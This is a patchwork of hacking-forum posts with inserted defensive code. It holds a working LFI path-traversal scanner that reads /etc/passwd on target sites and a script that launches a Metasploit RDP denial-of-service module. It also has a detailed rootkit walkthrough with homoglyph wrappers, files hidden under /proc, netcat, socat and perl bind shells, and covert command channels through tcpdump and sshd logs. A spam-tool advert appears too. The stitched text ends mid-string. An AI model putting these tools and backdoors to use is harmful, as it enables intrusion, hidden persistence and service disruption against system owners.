commandList.add_option('-t', '--target', action="store", dest="target",
                       help="Insert page: The name of the page to be scanned (Ex. index.php?page=)",
                       )
commandList.add_option('-p', '--port', action="store", dest="port", default=0, type="int",
                       help="[insert Port Number] - Default 80 or 443",
                       )
commandList.add_option('--timeout', action="store", dest="timeout", default=10, type="int",
                       help="[Timeout Value] - Default 10",
                       )
commandList.add_option('-r', '--random-agent', action="store_true", dest="randomagent", default=False,
                       help="[set random UserAgent]",
                       )

options, remainder = commandList.parse_args()

# Usage:
if ( not options.url or not options.target):
    print(banner)
    print commandList.print_help()
    sys.exit(1)

#
# UserAgent list
# Top UA 18/08/2014
# http://techblog.willshouse.com/2012/01/03/most-common-user-agents/
def randomAgentGen():
    userAgent = [
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
        'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46',
        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
        'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
        'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
        'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
        'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
        'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',
        'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
        'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
        'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
    ]
    if RANDOMAGENT:
        UA = random.choice(userAgent)
        headers = { 'User-Agent' : UA }
    else:
        UA = "Python-urllib/%s.%s" % sys.version_info[:2]
        headers = { 'User-Agent' : UA }
    return headers

# File check list + regexp
CHECK = dict()
CHECK['etc/passwd'] = '^([a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:/[^:]*:/[^:]*)$'
CHECK['etc/group'] = '^([a-z]*:[^:]*:[0-9]*:[0-9]*)$'
# IPv4 address, full IPv6 address, or compressed IPv6 address at the start of a hosts line.
# The posted pattern contained a nested quantifier ("{1,4}{0,5}") that Python's re rejects as
# "multiple repeat"; the compressed-IPv6 alternative is written out here so the expression compiles.
CHECK['etc/hosts'] = '^(((([1]?\d)?\d|2[0-4]\d|25[0-5])\.){3}(([1]?\d)?\d|2[0-4]\d|25[0-5]))|([\da-fA-F]{1,4}(\:[\da-fA-F]{1,4}){7})|(([\da-fA-F]{1,4}:){0,5}(:[\da-fA-F]{1,4}){0,5}[\da-fA-F]{1,4})'

RANDOMAGENT = options.randomagent
TIMEOUT = options.timeout
URL = options.url
PORT = options.port
TARGET = options.target

if URL[0:8] == "https://":
    PROTO = URL[0:8]
    URL = URL[8:]
    if URL.endswith("/"):
        URL = URL.replace("/","")
    if PORT == 0:
        PORT = 443
elif URL[0:7] == "http://":
    PROTO = URL[0:7]
    URL = URL[7:]
    if URL.endswith("/"):
        URL = URL.replace("/","")
    if PORT == 0:
        PORT = 80
else:
    PROTO = "http://"
    URL = options.url
    if URL.endswith("/"):
        URL = URL.replace("/","")
    if PORT == 0:
        PORT = 80

try:
    #URL = socket.gethostbyname( URL )
    socket.gethostbyname( URL )
except socket.gaierror:
    #could not resolve
    print 'Hostname could not be resolved. Exiting'
    sys.exit()

headers = randomAgentGen()

print(banner)
print
print('[*] URL:\t'+PROTO+URL)
print('[*] TARGET:\t'+TARGET)
print('[*] PORT:\t'+str(PORT))
print

found = 0
for fileCheck, fileRegexp in CHECK.items():
    FILE = fileCheck
    REGEXP = fileRegexp
    checkValidRegexp = re.compile(REGEXP, re.IGNORECASE)
    for scanLFI in range(1, 11):
        PATHTRAV = "../"
        PATHTRAV = PATHTRAV * scanLFI
        try:
            req = urllib2.Request(PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE, None, headers)
            connection = urllib2.urlopen(req, None, TIMEOUT)
            response = connection.readlines()
            getcode = connection.getcode()
            sentinel = 0
            for checkResponse in response:
                #if (getcode == 200 and response != ""):
                if (getcode == 200 and checkValidRegexp.match(checkResponse)):
                    sentinel = sentinel + 1
            if sentinel > 1:
                print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE+'\t <--- FOUND')
                found = found + 1
            else:
                print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE)
        # HTTP error - 4xx, 5xx
        except urllib2.HTTPError:
            print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE)
        # Connection error - Connection refused, No route to host
        except urllib2.URLError:
            print('Can\'t connect to host: '+PROTO+URL+' on port '+str(PORT))
            sys.exit()

if found < 1:
    print
    print('[+] Nothing found')
Source
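As an added example, not part of the scanner or the post above: the server-side resolution check that defeats the probe pattern it sends (realpath plus commonpath rather than string prefix matching) and a detector for the same pattern in web access logs, where a single run of the scanner shows up as thirty requests from one address walking "../" depths against etc/passwd, etc/group and etc/hosts. The log lines, addresses and paths are constructed, and the three-request threshold is this example's choice.

```python
"""Added example, not part of the scanner post above: the server-side path
check that stops the probe pattern it sends, plus a detector for that
pattern in web access logs. Every path, address and log line here is
constructed for illustration."""
import os
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed combined-format log lines: a burst of probes from one source
# (the scanner above walks ten "../" depths for each of three files) and one
# ordinary request from another.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Aug/2014:10:00:01 +0000] "GET /index.php?page=../etc/passwd HTTP/1.1" 200 512 "-" "Python-urllib/2.6"',
    '203.0.113.7 - - [18/Aug/2014:10:00:01 +0000] "GET /index.php?page=../../etc/passwd HTTP/1.1" 200 1843 "-" "Python-urllib/2.6"',
    '203.0.113.7 - - [18/Aug/2014:10:00:02 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fgroup HTTP/1.1" 404 221 "-" "Python-urllib/2.6"',
    '198.51.100.4 - - [18/Aug/2014:10:00:03 +0000] "GET /index.php?page=about HTTP/1.1" 200 3071 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# The three files the scanner above looks for.
SENSITIVE_RE = re.compile(r"\betc/(passwd|group|hosts)\b", re.IGNORECASE)


def safe_include_path(base_dir: str, requested: str) -> Optional[str]:
    """Resolve a user-supplied include name under base_dir, or return None
    when the result would leave it. realpath() collapses every '..' (and any
    symlink), and commonpath() avoids the string-prefix trap where
    /srv/pages2 passes a startswith('/srv/pages') check."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, unquote(requested)))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def classify_request(raw_path: str) -> List[str]:
    """Reasons a request path looks like a traversal probe (empty if none)."""
    decoded = unquote(unquote(raw_path))  # second pass catches %252e%252e%252f
    reasons = []
    depth = decoded.count("../") + decoded.count("..\\")
    if depth:
        reasons.append(f"traversal depth {depth}")
    hit = SENSITIVE_RE.search(decoded)
    if hit:
        reasons.append(f"targets {hit.group(0)}")
    return reasons


def scan_access_log(lines: List[str]) -> List[Dict]:
    """Parse combined-format lines and keep those that look like probes."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m["path"])
        if reasons:
            findings.append({"ip": m["ip"], "status": int(m["status"]),
                             "path": m["path"], "reasons": reasons})
    return findings


def suspicious_sources(findings: List[Dict], threshold: int = 3) -> Dict[str, int]:
    """Source addresses with at least `threshold` probe requests."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["path"], "|", "; ".join(f["reasons"]))
    print("sources over threshold:", suspicious_sources(scan_access_log(SAMPLE_LOG)))
    print("allowed:", safe_include_path("/srv/app/pages", "sub/../about.php"))
    print("blocked:", safe_include_path("/srv/app/pages", "../../etc/passwd"))
```

A 200 with a body size in the low kilobytes on one of the flagged paths (the second sample line) is the one to investigate first, since that is what the scanner's own regex check keys on when it reports FOUND; the 404s around it are the same run failing at other depths.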
-
-
KingSpam
Author: Doddy Hackman
A simple Perl script to spam emails and IRC channels.
You have the following options:
[+] Spamming channel or a normally always
[+] Spamming an entire server
[+] Spamming a list of servers and all its channels
[+] Able to choose a nick to the bot and timeout
[+] Allows spamming email accounts
A video with examples of use:
Download:
https://github.com/DoddyHackman/KingSpam.git
https://github.com/DoddyHackman/KingSpam/archive/master.zip
Source
-
Penetration Testing with the Bash shell
Make the most of the Bash shell and Kali Linux's command-line-based security assessment tools
Author: Keith Makan
Download: https://www.scribd.com/doc/252492167/Penetration-Testing-with-the-Bash-shell
-
Pro Mailer: PHP - Inbox - Attach files - Smtp - SSL
Download: http://pastebin.com/HnMUgbnt
-
#!/usr/bin/python
# jutthaxor@gmail.com
import os,sys,re,subprocess

print '''
+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+-+
|R|d|p| |A|u|t|o|E|x|p|l|o|i|t| |B|y| |S|t|o|k|e|r|
+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+-+

[!] Author - Muhammad Adeel aka Stoker
[!] Mail - jutthaxor@gmail.com
[!] Greetz - Team Xploiters
[!] P.S : This Exploit is Based on => auxiliary/dos/windows/rdp/ms12_020_maxchannelids <='''

# nmap raw scans and msfcli need root
if os.getuid() != 0:
    print '\n\t\t[Insufficient Privileges] Error: You are not root!\n'
    sys.exit(1)

def help():
    if len(sys.argv) != 2:
        print """
[!] Usage   - ./script.py [Target Host]
[!] Example - ./script.py 127.0.0.1\n"""
        sys.exit(1)

help()
RHOST = sys.argv[1]

# scan only the RDP port and keep nmap's normal output for parsing
nmap = subprocess.Popen('nmap -p3389 %s -oN /tmp/nmap.txt' %RHOST, shell=True).wait()
nmapresul = open('/tmp/nmap.txt', 'rU')
found = nmapresul.read()
vulnerability = re.search(r'3389[/]tcp\sopen', found)
# test the regex match, not the (never empty) nmap output
if not vulnerability:
    print "\n[!] Port 3389 is closed."
    sys.exit(1)

print '\n[!] Port is open. Let me try AutoRdp Exploit'
metasploit = subprocess.Popen('msfcli auxiliary/dos/windows/rdp/ms12_020_maxchannelids RHOST=%s RPORT=3389 E' %RHOST, shell=True).wait()
subprocess.Popen('rm -f /tmp/nmap.txt > /dev/null', shell=True).wait()
end = raw_input('Hit Enter to Exit.')

Source
-
Contents

Basic operation of rootkit
Shell script version of rootkit
C version of rootkit
Using the rootkit to hide stuff
File hiding below the proc filesystem
Netcat remote shell
Using tcpdump as a covert communication path
SCTP remote shell
Hidden shell on /dev/tty9
Covert communication path with sshd and /var/log/auth.log

Basic operation of rootkit

This blog post shows how to install a simple rootkit with one single (but relatively long) line on a terminal. While the rootkit is not as capable and hard to detect as a full kernel rootkit, it is still able to hide itself, other files, running processes and even open TCP/UDP ports from the system administrator. We have used variations of this rootkit in the hacking contest for several years and it has never been detected and removed in phase 2.

The rootkit works by replacing the commands ls, netstat, ps, lsof and find with a simple wrapper, which calls the original command with all arguments and pipes the output to “grep -vE ‘regex_of_stuff_to_hide’” to filter out lines of the output. There are two variations of the rootkit. The first one uses a simple shell script for the wrapper while the second one compiles a small C program instead (which makes the rootkit harder to detect and analyze in the limited time of the hacking contest).

Shell script version of rootkit

The shell script version is still useful if the system doesn’t contain a C compiler:

which ls netstat ps lsof find|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|177\"";chmod 493,$o'

The which command lists the absolute paths of the programs to manipulate in the rootkit. These absolute paths are passed to a perl one-liner. The perl program starts by defining the variables $s and $n, which are initialized with the Unicode characters U+0455 and U+0578. These characters look like the ASCII characters “s” and “n”.

Then it copies the original filename to $o and changes the filename in $_ by replacing the “s” in ls, netstat, ps and lsof with U+0455 and the “n” in find with U+0578. The result of these replacements is a new filename which looks exactly like the original filename. The original program is then renamed to the new name and then replaced with a shell script, which calls the renamed original program ($_) and pipes the output to grep. The grep command filters lines containing one of the following:

Unicode characters used by the rootkit ([$s-$n]) => Makes the rootkit self-hiding
The string “grep” => Don’t show that grep is running in the output of ps
The string “177” => This is used for the stuff which should be hidden by the rootkit.

This rootkit is pretty easy to detect and analyze because it can easily be seen with the file command that programs like ps or ls have changed their type from an ELF binary to a shell script. After discovering the rootkit, it is also pretty easy to analyze its functionality and then selectively find the backdoors hidden by the rootkit.

C version of rootkit

In order to make finding and analyzing the rootkit more difficult, it is also possible to compile small binaries instead of the shell script:

which ls netstat ps lsof find|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"177|\$\$|[$s-$n]|grep\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'

The beginning is pretty much like the first variant of the rootkit. However, instead of directly writing the wrapper program, the perl script opens a pipe to gcc and writes a small C program to this pipe. The following shows a more readable version of the C program:

int main(int a,char**b){
    char*c[999999]={"sh","-c","original_program \$*|grep -vE \\"177|\$\$|[$s-$n]|grep\\""};
    memcpy(c+3,b,8*a);
    execv("/bin/sh",c);
}

The first line initializes the argument array for execv with “sh -c” and the same shell command as the first variant of the rootkit, while the second line copies all remaining arguments from the argv array passed to the wrapper binary to the end of the argument array for execv.

Using the rootkit to hide stuff

The following section shows some of the stuff which can be hidden by the rootkit. In order to hide a process using the rootkit, it must match the regular expression of the grep command. This can easily be achieved by making the process name contain the string “177”. For hiding open ports from netstat/lsof, the port number has to contain “177”.

File hiding below the proc filesystem

Another interesting dilemma when hiding backdoors is whether you want to leave the backdoor binary in the filesystem or not. If you keep the binaries in the filesystem, the backdoor can be found and detected there. On the other hand, it is relatively uncommon to have open file descriptors to deleted files on a typical desktop Linux system, and so a defender can easily spot processes with open file handles to deleted files using e.g. the following command:

ls -l /proc/*/fd|grep deleted

In order to get around this limitation, we have found a clever new way of hiding files from the system administrator without deleting the files: unmount the /proc directory, place the files in /proc on the root filesystem and remount the proc filesystem. Since there may be processes accessing the proc filesystem while we try to unmount it, we use the -l option of umount for lazy unmounting:

umount -l /proc

Now we can create a few files there for our backdoors:

cd /proc
cp /usr/bin/perl 177a
cp /usr/sbin/tcpdump 177b
cp /bin/nc.tr* 177c
cp `which socat` 177d
mknod 177e c 4 9 # This is a copy of /dev/tty9
ln /var/log/auth.log 177f

Netcat remote shell

The first backdoor is a simple netcat listener with a shell attached (177c is a copy of nc.traditional):

./177c -l -p 3177 -e /bin/sh &

If there is no compatible netcat available, we can use socat (177d) or perl (177a) instead:

./177d TCP4-Listen:3177,fork EXEC:/bin/sh &

And if socat is missing as well, we can still use perl:

./177a -MIO -e'$s=new IO::Socket::INET(LocalPort=>1337,Listen=>1);while($c=$s->accept()){$_=<$c>;print $c `$_`;}'&

Due to the rootkit these processes and the open port can’t be seen with standard system tools like ps or netstat.

Using tcpdump as a covert communication path

Another backdoor can be built based on tcpdump (which has been copied to 177b):

./177b -iany -n -A udp 2>&1|./177a -ne'system($1)if/LEGO(.*)/'&

This command makes tcpdump listen for UDP packets on any interface and, due to the -A option, it outputs the raw packet data to STDOUT, which is then piped to a small perl one-liner, which checks for a marker (the string “LEGO”) and passes everything from there to system(). This backdoor is particularly interesting because it provides remote root access without any open ports (which might still be detected e.g. with a port scan).

SCTP remote shell

The following backdoor uses socat (copied to 177d) to open a backdoor via SCTP.

./177d SCTP-Listen:1177,fork EXEC:/bin/bash&

Since SCTP is not listed with netstat, it is less likely to be detected than a standard backdoor via TCP/UDP.

Hidden shell on /dev/tty9

The following uses perl (177a) to open a shell on /dev/tty9 (177e), which can be accessed via [CTRL]+[ALT]+[F9].

./177a -pe'system$_'<177e>177e&

Opening a shell on tty devices like this is an old trick and well-prepared teams usually check for that kind of backdoor by switching over all virtual terminals and looking for a shell prompt (due to the perl one-liner instead of a real shell there is no visible shell prompt with our exploit) or by running a command like “lsof -n /dev/tty*” (which won’t detect our version of the backdoor since we recreated the device with mknod).

Covert communication path with sshd and /var/log/auth.log

The following perl (177a) one-liner continuously monitors 177f (which is a hard link to /var/log/auth.log) for a magic string (“LEGO”) and parses the following characters as a hex-encoded string, which is then decoded and passed to system.

./177a -e'while(1){sleep(1);while(<>){system pack("H*",$1)if/LEGO(\w+)/}}'<177f&

This can be exploited by trying to log in with a specially crafted username via ssh. The ssh server writes an error message to /var/log/auth.log and, since the error message contains the username, this can be used to remotely inject arbitrary code into the system:

# Hex-encode our shell command:
perl -e 'print "LEGO".unpack("H*","id > /tmp/auth.owned")."\n"'
LEGO6964203e202f746d702f617574682e6f776e6564

# Use the resulting string as a username for an ssh login to get the command executed:
ssh LEGO6964203e202f746d702f617574682e6f776e6564@target_ip

After installing the backdoor programs to /proc, we can remount the proc filesystem to hide the files from the administrator:

mount -t proc proc /proc

Since the files still exist hidden below the proc filesystem, they are not listed as deleted files in /proc/pid/fd.

Source
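Every hiding trick in the post depends on the administrator trusting the wrapped tools, so the defender's move is to read the filesystem and /proc directly. The following is an added Python 3 example (not from the post) that does that for the techniques described above: it flags filenames containing look-alike code points such as U+0455 and U+0578, flags expected ELF tools whose first bytes are no longer the ELF magic (what `file` would report), and lists listening ports and process names from /proc/net/tcp and /proc/<pid>/comm rather than from netstat or ps. The /proc/net/tcp excerpt and the fake bin directory are constructed for the example.

```python
import os
import tempfile
import unicodedata

# The wrapper rootkit replaces these tools and renames the originals using a
# look-alike for 's' (U+0455) or 'n' (U+0578); these checks never call them.
WRAPPED_TOOLS = ("ls", "netstat", "ps", "lsof", "find")
ELF_MAGIC = b"\x7fELF"

def non_ascii_names(directory):
    """Filenames containing any non-ASCII code point, each with the Unicode
    names of the offending characters. A PATH directory should yield nothing."""
    findings = []
    for name in sorted(os.listdir(directory)):
        odd = [c for c in name if ord(c) > 0x7F]
        if odd:
            findings.append((name, [unicodedata.name(c, "?") for c in odd]))
    return findings

def script_wrappers(directory, expected_elf=WRAPPED_TOOLS):
    """Tools present in `directory` whose first bytes are not the ELF magic,
    i.e. a binary that has turned into a script (or a non-ELF wrapper)."""
    hits = []
    for name in expected_elf:
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            with open(path, "rb") as fh:
                if fh.read(4) != ELF_MAGIC:
                    hits.append(name)
    return hits

def listening_ports(proc_net_tcp_text):
    """Listening TCP ports parsed from /proc/net/tcp (hex local port, state
    0A = LISTEN). A filtered netstat cannot hide what is in this file."""
    ports = []
    for line in proc_net_tcp_text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 4 and fields[3] == "0A":
            ports.append(int(fields[1].rsplit(":", 1)[1], 16))
    return sorted(ports)

def proc_names(proc="/proc"):
    """pid -> name read from /proc/<pid>/comm, bypassing ps. Any pid present
    here that a wrapped ps omits is a hidden process."""
    names = {}
    for pid in os.listdir(proc):
        if pid.isdigit():
            try:
                with open(os.path.join(proc, pid, "comm")) as fh:
                    names[int(pid)] = fh.read().strip()
            except OSError:
                pass
    return names

# Constructed /proc/net/tcp excerpt: 0x0C69 is the post's port 3177, 0x0016 is sshd.
PROC_NET_TCP_SAMPLE = """\
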